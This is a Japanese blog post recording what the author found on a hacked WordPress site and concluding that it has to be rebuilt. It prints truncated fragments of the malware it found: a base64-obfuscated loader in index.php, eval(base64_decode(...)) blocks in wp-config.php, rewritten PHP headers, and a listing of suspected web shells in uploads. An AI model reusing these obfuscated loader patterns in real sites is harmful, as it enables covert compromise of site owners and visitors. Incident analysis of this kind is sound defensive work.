クラックされたwordpressを見てみた

ページが開けない、というので、調べてみたら、クラックされたwordpressだったので、いろいろファイルをのぞいてみた記録

ざらっと調べてみたけど、被害範囲がでかすぎたので、最初から作ってもらうしかないです、という回答となりました。

・index.php に下記のような文字列が埋め込まれていた

1$GLOBALS['_502176623_']=Array(base64_decode('ZXJyb3Jf' .'cm' .'V' .'wb3' .'J0aW5' .'n'),base64_decode('cHJlZ' .'19tYXRj' .'aA=' .'='),base64_decode('cHJlZ19' .'y' .'Z' .'XBsYW' .'Nl'),base64_decode('c3' .'RycG9' .'z'),base64_decode('' .'bWQ1'),base64_decode('ZnVuY' .'3Rp' .'b25fZXhpc3Rz'),base64_decode('Y3' .'Vy' .'bF9pbml' .'0'),base64_decode('Y' .'3Vyb' .'F9zZ' .'XRvcH' .'Q='),base64_decode('Y' .'3Vyb' .'F9zZXRv' .'cHQ='),base64_decode('Y' .'3V' .'yb' .'F9zZX' .'R' .'vcHQ'
2<略>
3+50)){echo $_8;}}elseif(@$GLOBALS['_502176623_'][13](_1644837808(1091))== round(0+0.25+0.25+0.25+0.25)){echo@$GLOBALS['_502176623_'][14]($_6);}}
4//###==###

・wp-config.php 下記のようなものが数箇所に埋め込まれていた

1eval(base64_decode("aWYgKCFkZWZpbmVkKCdBTFJFQURZX1JVTl8xYmMyOWIzNmYzNDJhODJhYWY2NjU4Nzg1MzU2NzE4JykpCnsKZGVmaW5lKCdBTFJFQURZX1JVTl8xYmMyOWIzNmYzNDJhODJhYWY2NjU4Nzg1MzU2NzE4JywgMSk7CgogJGF1YnRvcSA9IDE2MDU7IGZ1bmN0aW9uIHh1Y3dxbXIoJHRidmRoLCAka29pbW5nbHcpeyRuanpuZXhxcSA9ICcnOyB
2<略>
3neCc9PidDJywgJ3onPT4nMCcpOwpldmFsLypkeXNwZiovKHh1Y3dxbXIoJGp5Z3h0c2IsICRxemlmeGY
4pKTsKfQ=="));

・wp-content/uploads/ にいろんなものがアップロードされている

1[root@host wp-content]# ls -la uploads/
2合計 56
3drwxr-xr-x  5 apache apache  4096 12月  3 11:45 2016 .
4drwxr-xr-x  7 apache apache  4096 11月  7 12:50 2016 ..
5-rw-r--r--  1 apache apache     0  5月  2 09:41 2016 1.php
6drwxr-xr-x  4 apache apache  4096 10月 10 22:31 2016 2015
7drwxr-xr-x 12 apache apache  4096 10月  1 01:17 2016 2016
8-rw-r--r--  1 apache apache 21377  5月  2 09:41 2016 dbc.php.suspected
9-rw-r--r--  1 apache apache  1367 11月  7 12:50 2016 jpgjsk.php.suspected
10-rw-r--r--  1 apache apache  4902  5月  2 09:41 2016 mates.php.suspected
11drwxr-xr-x  2 apache apache  4096 12月 13 23:58 2016 ps_auto_sitemap
12[root@host wp-content]#

・wp-admin/.bt と wp-admin/css/.bt というファイルが作成され、おそらくアクセス許可IPが記載されている
ファイル末尾に追記されるわけではなく、ソートされた順序で増えていっていた

10.5.2.2
20.83.4.1
3100.2.201.8
4100.35.50.239
5100.43.80.14
6<略>
799.98.120.94
899.98.2.226
9#version:1

・いろんなphpの冒頭が下記のように書き換えられている

1<?php
2 
3 
4 
5 
6 
7                                      $h00d = 846;$GLOBALS['a287']=Array();globa
8l$a287;<略>
9$a287['h6d2'][65]]);}exit();} ?><?php
10/**

・あと、データベースにいろいろデータが突っ込まれていた

コメントを残す

メールアドレスが公開されることはありません。 が付いている欄は必須項目です

This site uses Akismet to reduce spam. Learn how your comment data is processed.

StatCounter - Free Web Tracker and Counter